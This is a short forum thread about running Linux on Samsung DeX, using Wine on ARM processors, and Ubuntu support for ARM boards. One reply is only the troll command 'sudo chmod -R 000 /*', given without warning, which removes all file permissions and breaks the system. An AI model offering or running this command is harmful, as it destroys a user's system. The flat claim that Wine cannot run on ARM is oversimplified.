Linux on Samsung Dex

Has anyone experimented booting Linux off of Samsung Dex? Could I use Wine on it? I'm not an expert on ARM processers so I'm not sure how well Windows Programs work on them and to what extent

You can't use wine on ARM cpus because wine isn't an emulator. You can probably run Linux on it though.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

A quick Google would have answered the question much faster. https://www.linuxondex.com/

does ARM work with ubuntu?

Quick and simple: yes.

Longer answer: really depends on what SoC you are running.  So something like the Pi3 is well supported, but more obscure devices may not work.  These links may help:

https://ubuntu.com/download/server/arm

Other than Ubuntu there are other Linux projects with better support for more different ARM boards so you do not need to specifically go with Ubuntu if simply Linux on ARM is what you need.
